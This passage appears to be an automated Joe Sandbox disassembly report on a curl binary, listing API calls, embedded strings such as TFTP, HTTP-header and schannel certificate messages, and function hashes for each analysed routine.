                                Similarity
                                • API ID: free$strtoul
                                • String ID: %s://%s$Switched from HTTP to HTTPS due to HSTS => %s$file$http$https
                                • API String ID: 961130014-588811053
                                • Opcode ID: 37e10c38aa26c237cc394d6bbd3137a457cbba8871e10d843c18d0aa175e2634
                                • Instruction ID: 83fefc4f292ba0e7616081bd1a7e8b22a9d34c34c2b0aef1fdc6ac8f87c552a6
                                • Opcode Fuzzy Hash: 37e10c38aa26c237cc394d6bbd3137a457cbba8871e10d843c18d0aa175e2634
                                • Instruction Fuzzy Hash: 85E1F171704A06ABEB18EB38D851BA9B7A5FF54710F14812AE819D73C1EF70EA048B85
                                APIs
                                • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 008980F9
                                • sendto.WS2_32(?,?,?,00000000,?,?), ref: 00898193
                                • WSAGetLastError.WS2_32(?,?,00000004,?,00000000), ref: 008981A2
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,00000004,?,00000000), ref: 008981D1
                                Strings
                                • Received ACK for block %d, expecting %d, xrefs: 00898149
                                • Timeout waiting for block %d ACK. Retries = %d, xrefs: 0089804D
                                • tftp_tx: internal error, event: %i, xrefs: 00898028
                                • tftp_tx: giving up waiting for block %d ack, xrefs: 0089816A
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: sendto$ErrorLast_time64
                                • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                                • API String ID: 3931062552-2715966420
                                • Opcode ID: f18311c91498534854ede6b5642cf8c66a34cd2fe225342af2cb6df6fba8ef52
                                • Instruction ID: 3d2f11e0ce0f6bae31cc5cdcd3a9ad76729440a9838ece6eb57681a502624f65
                                • Opcode Fuzzy Hash: f18311c91498534854ede6b5642cf8c66a34cd2fe225342af2cb6df6fba8ef52
                                • Instruction Fuzzy Hash: D2916871204B02DFDB65AF38C885BE6B7F5FB56304F08891EE89EC6261DB30A944DB51
                                APIs
                                • send.WS2_32(?,?,00000006,00000000), ref: 0089F340
                                • WSAGetLastError.WS2_32 ref: 0089F34A
                                • send.WS2_32(?,?,?,00000000), ref: 0089F3E5
                                • WSAGetLastError.WS2_32 ref: 0089F3EF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ErrorLastsend
                                • String ID: %127[^,]%1[,]%127s$%c%c$%c%c%c%c$%c%c%c%c%s%c%c$%c%s$%c%s%c%s$Sending data failed (%d)
                                • API String ID: 1802528911-3533120981
                                • Opcode ID: 127a090ff148adff3c73c76474296fccf13537c1e1ee999a8f2317709a7d131b
                                • Instruction ID: e85eab561e75659c3d021ac1e2e9c0027b48a445add5f955256b4f5cac563c31
                                • Opcode Fuzzy Hash: 127a090ff148adff3c73c76474296fccf13537c1e1ee999a8f2317709a7d131b
                                • Instruction Fuzzy Hash: 3E81D671644219AFEB24DB18CC46FEA77B8FB44700F0841F5F64DEB283DA71AA458B61
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00891902
                                • ___from_strstr_to_strchr.LIBCMT ref: 00891913
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,?,?,0088A14F,?), ref: 00891AC8
                                  • Part of subcall function 0087D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087D13A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrfree
                                • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:
                                • API String ID: 653773606-2985882615
                                • Opcode ID: 1836fc55642a76447198b76b38c3e31095a9ac9c8b5222643bb0b61725ed8dc1
                                • Instruction ID: 55136073bb5fcbb2f84a873780890778f26df563fccae176eeeb0e3a9bd8a178
                                • Opcode Fuzzy Hash: 1836fc55642a76447198b76b38c3e31095a9ac9c8b5222643bb0b61725ed8dc1
                                • Instruction Fuzzy Hash: FD71F134B087279BEF28EEA8949876DBBE1FF05754F2C806AD545EB285DB309D41C780
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000001,00000000,00000000), ref: 00862E50
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000002), ref: 00862E67
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000103,00000001,00000000,00000000), ref: 00862EB2
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00862FA9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: strncpy$_strdupmalloc
                                • String ID: AUX$CLOCK$$COM$CON$LPT$NUL$PRN
                                • API String ID: 3833483438-925842913
                                • Opcode ID: 0fd6db3173fcf759070533732380072d399277ed36969d9e2faddb69c19cd553
                                • Instruction ID: d7240554d229a05df8352b421b1cb0f85a419b41776443c4f9cf517031dc63ce
                                • Opcode Fuzzy Hash: 0fd6db3173fcf759070533732380072d399277ed36969d9e2faddb69c19cd553
                                • Instruction Fuzzy Hash: 42618B31604E0646DF358A288860BFA77E9FF96748F2641E8D886CB242DF25CE898751
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 00874F5C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874FD2
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874FE4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00874FF6
                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00000000,008C2984,00000000,00000000,?), ref: 00875039
                                • ___from_strstr_to_strchr.LIBCMT ref: 00875055
                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,008C2984,00000000,00000000,?), ref: 00875082
                                • ___from_strstr_to_strchr.LIBCMT ref: 0087509A
                                • strcspn.API-MS-WIN-CRT-STRING-L1-1-0(00875B45,008C2984,00000000,00000000,?), ref: 008750C3
                                • ___from_strstr_to_strchr.LIBCMT ref: 008750DB
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr$freestrcspn
                                • String ID:
                                • API String ID: 2030676775-3916222277
                                • Opcode ID: 7d6f66ef9fa0cadc3083c79a5a4f432d4c8fcc16dcbd51137217dffd760f0ecd
                                • Instruction ID: e4aadaadca09948f579ecda3804734a5f8d8b6ec576353c5db5ca61a64cd18e5
                                • Opcode Fuzzy Hash: 7d6f66ef9fa0cadc3083c79a5a4f432d4c8fcc16dcbd51137217dffd760f0ecd
                                • Instruction Fuzzy Hash: 4A51A332904A199FDB24CF54D884BADBBF4FF04714F24C15EE809E7285DBB1D9058B90
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00891CC2
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00891D16
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00891D81
                                • ___from_strstr_to_strchr.LIBCMT ref: 00891DAF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00891DD1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$___from_strstr_to_strchr
                                • String ID: Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$P
                                • API String ID: 622630536-3255330290
                                • Opcode ID: 0372db96160ca865777c7c36d129ab31da6572a88bad70d4796d6826c67cc7fa
                                • Instruction ID: 312669ef49d545b29fc0f895f6e5af4584beac7a0d5835b0a00aa60fb511314b
                                • Opcode Fuzzy Hash: 0372db96160ca865777c7c36d129ab31da6572a88bad70d4796d6826c67cc7fa
                                • Instruction Fuzzy Hash: 2151E3757086069FEF19AB649C48BA97BA5FF45310F1C817AEC05CB392DB71EC448BA0
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00890C07
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: %s auth using %s with user '%s'$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-authorization$Server
                                • API String ID: 1294909896-3316699798
                                • Opcode ID: 2fabb495dd38c305841f2fecc8c7ec0c9ec803fb852622f83cf95aca188dc74b
                                • Instruction ID: 5035d2baccf4c5c50ad2949535b7623f3ddeb66edcc95e41d1ba47c198322f6c
                                • Opcode Fuzzy Hash: 2fabb495dd38c305841f2fecc8c7ec0c9ec803fb852622f83cf95aca188dc74b
                                • Instruction Fuzzy Hash: 1C412531704605AFDF28BA688841BADB7B2FF81328F28812EE546C7381DB71DD449F52
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB20
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB42
                                • realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008ACB9C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: callocmallocrealloc
                                • String ID: $ $ $-$>
                                • API String ID: 3005434335-2764683982
                                • Opcode ID: 7f674e0bdd421f8896019ac503661cb1a55e3d2c5773ac0d5ff895f5ac6208ae
                                • Instruction ID: dfabc1cff4997f784730282ea9f47f79f7eeaf136cdcac93280bf41c69908e70
                                • Opcode Fuzzy Hash: 7f674e0bdd421f8896019ac503661cb1a55e3d2c5773ac0d5ff895f5ac6208ae
                                • Instruction Fuzzy Hash: 7A816431A11B069FEB24CF29D544725BBF2FB0A324F18861AD416C7E91D772F890CB96
                                APIs
                                • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00897E69
                                • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00897ECD
                                • sendto.WS2_32(?,?,00000004,00000000,?,?), ref: 00897F6D
                                • WSAGetLastError.WS2_32(?,?,00000000), ref: 00897F78
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000000), ref: 00897FBE
                                Strings
                                • Received last DATA packet block %d again., xrefs: 00897F0D
                                • Timeout waiting for block %d ACK. Retries = %d, xrefs: 00897DC3
                                • Received unexpected DATA packet block %d, expecting block %d, xrefs: 00897FC9
                                • tftp_rx: internal error, xrefs: 00897D97
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: sendto$ErrorLast_time64
                                • String ID: Received last DATA packet block %d again.$Received unexpected DATA packet block %d, expecting block %d$Timeout waiting for block %d ACK. Retries = %d$tftp_rx: internal error
                                • API String ID: 3931062552-2298932677
                                • Opcode ID: 977395410e296d292fe1a52d2cf51161e3124a6d97837163e5004acf93c29c62
                                • Instruction ID: da3b0ba55c2730c234e008095416d6b047aebe9088dca6060a7ff9c63ef05889
                                • Opcode Fuzzy Hash: 977395410e296d292fe1a52d2cf51161e3124a6d97837163e5004acf93c29c62
                                • Instruction Fuzzy Hash: EC71BB30208B009FD7219F28CC85FB7BBE5FF55700F08895DEA9EDA2A1D674A904DB61
                                APIs
                                • _strrchr.LIBCMT ref: 0086D165
                                • _strrchr.LIBCMT ref: 0086D16F
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(008B74AB), ref: 0086D198
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002), ref: 0086D1D9
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001), ref: 0086D1F4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 0086D27A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086D2A4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086D2BD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strrchr$_strdupmallocstrncpy
                                • String ID: ://$|<>"?*
                                • API String ID: 1245388853-1792949323
                                • Opcode ID: 86e8d394ed0384d59033b971785998fb6b6d0b8b19becc96d625396bb98498e6
                                • Instruction ID: b6d16e0100ad2c00e98b3fa6ac8b7ed2731325f6af18a7bdeaf9fc0482735d81
                                • Opcode Fuzzy Hash: 86e8d394ed0384d59033b971785998fb6b6d0b8b19becc96d625396bb98498e6
                                • Instruction Fuzzy Hash: FF512532F047569BDB219BA8D8757BABBA5FF46710F274065D841EB382DAB0DD009390
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AF232
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 008AF280
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008AF309
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AF359
                                Strings
                                • schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 008AF33A
                                • schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 008AF254
                                • schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 008AF2E0
                                • schannel: CertGetNameString() returned no certificate name information, xrefs: 008AF20E
                                • schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 008AF2C9
                                • schannel: server certificate name verification failed, xrefs: 008AF328
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdupmalloc
                                • String ID: schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
                                • API String ID: 111713529-4178580626
                                • Opcode ID: 06f7431a59add98e7e0e494327f57113505a30249c4e6498bdb49b3f098b5c12
                                • Instruction ID: e0e060ee24b451269ccff90bc8ed411136dc540bb81deb3b93d9259137c2f225
                                • Opcode Fuzzy Hash: 06f7431a59add98e7e0e494327f57113505a30249c4e6498bdb49b3f098b5c12
                                • Instruction Fuzzy Hash: 96412A36A04604ABEF259B98DC01FAE7BB5FF86750F24406DEA05E7743DB719D018B90
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,00881751,?,00000000,?,?,?,00868BF9), ref: 00886D39
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00868BF9), ref: 00886D52
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00868BF9), ref: 00886D69
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00868BF9), ref: 00886D80
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886D97
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DAE
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DC5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DDC
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886DF3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E0A
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E21
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E38
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E4F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00886E66
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 2b85b65f312b0df72e51d84fe372a5cbbf169bcd6820aa3e693c61725257a287
                                • Instruction ID: fc5a450fc0c6621d81a7fda10fcb46e2e804979db2e682728665682cc16d7eb4
                                • Opcode Fuzzy Hash: 2b85b65f312b0df72e51d84fe372a5cbbf169bcd6820aa3e693c61725257a287
                                • Instruction Fuzzy Hash: 12417772A14A26EFDB045F24EC48458BFB6FF4C661314962BD50693B62CBB5BC208FD0
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 008A2A8C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 008A2A9E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 008A2ABA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 008A2ACE
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?), ref: 008A2AE7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: /$MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
                                • API String ID: 1294909896-4153388952
                                • Opcode ID: 3b86d9cdbaab1e7661443a62d6af4b3fb7e4ed8fa6200a3ca438e07756cb3586
                                • Instruction ID: 63237b06b3dc3849b58926b3438ab755fce68f7dcb433b0323d5d8a9fffee887
                                • Opcode Fuzzy Hash: 3b86d9cdbaab1e7661443a62d6af4b3fb7e4ed8fa6200a3ca438e07756cb3586
                                • Instruction Fuzzy Hash: 3F818D30A042499FEF34DF688450BAEBBB5FF56710F1480AEC841E3A52EB31AD04CB51
                                APIs
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed,?,?,?,?,00000000), ref: 0086E483
                                Strings
                                • --:--:--, xrefs: 0086E8A1
                                • DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed, xrefs: 0086E47E
                                • %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s, xrefs: 0086E949
                                • %3I64d, xrefs: 0086E686, 0086E6DF
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s$%3I64d$--:--:--$DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed
                                • API String ID: 1795875747-33453460
                                • Opcode ID: 5edef3baa7307701cf3a6b6dd1136d42985f60642376f5ca6535b19e5468bee7
                                • Instruction ID: c0557f2899c91aabcae6d54908445d8148a663c5780782f5a989012c9872c0eb
                                • Opcode Fuzzy Hash: 5edef3baa7307701cf3a6b6dd1136d42985f60642376f5ca6535b19e5468bee7
                                • Instruction Fuzzy Hash: 0D0269B5D002589FDB11CFA8C884EDDBBB6FF49304F1881AAE608AB352D7716946CF50
                                APIs
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 008685D1
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0086861E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086864D
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 0086867C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008686F7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00868795
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$_strdup$malloc
                                • String ID: %s$--url$option %s: %s
                                • API String ID: 854390910-3421415073
                                • Opcode ID: 2e1b359f64a3b545170d49ef4d682138288a61bde605b0c37df2dbf625d0eff7
                                • Instruction ID: 2b6bf568edbaf10843b7ea941cdcae5172169c250fe46cdc55c34422aef8e9fc
                                • Opcode Fuzzy Hash: 2e1b359f64a3b545170d49ef4d682138288a61bde605b0c37df2dbf625d0eff7
                                • Instruction Fuzzy Hash: B361E170A04109EFCB259B68C498BAEBBB1FB54310F2642AAE54DE7391DE709D81C751
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00867E8E
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B7A20), ref: 00867EA0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867EB2
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00867ECF
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00867EDB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867F11
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00867F21
                                Strings
                                Memory Dump Source
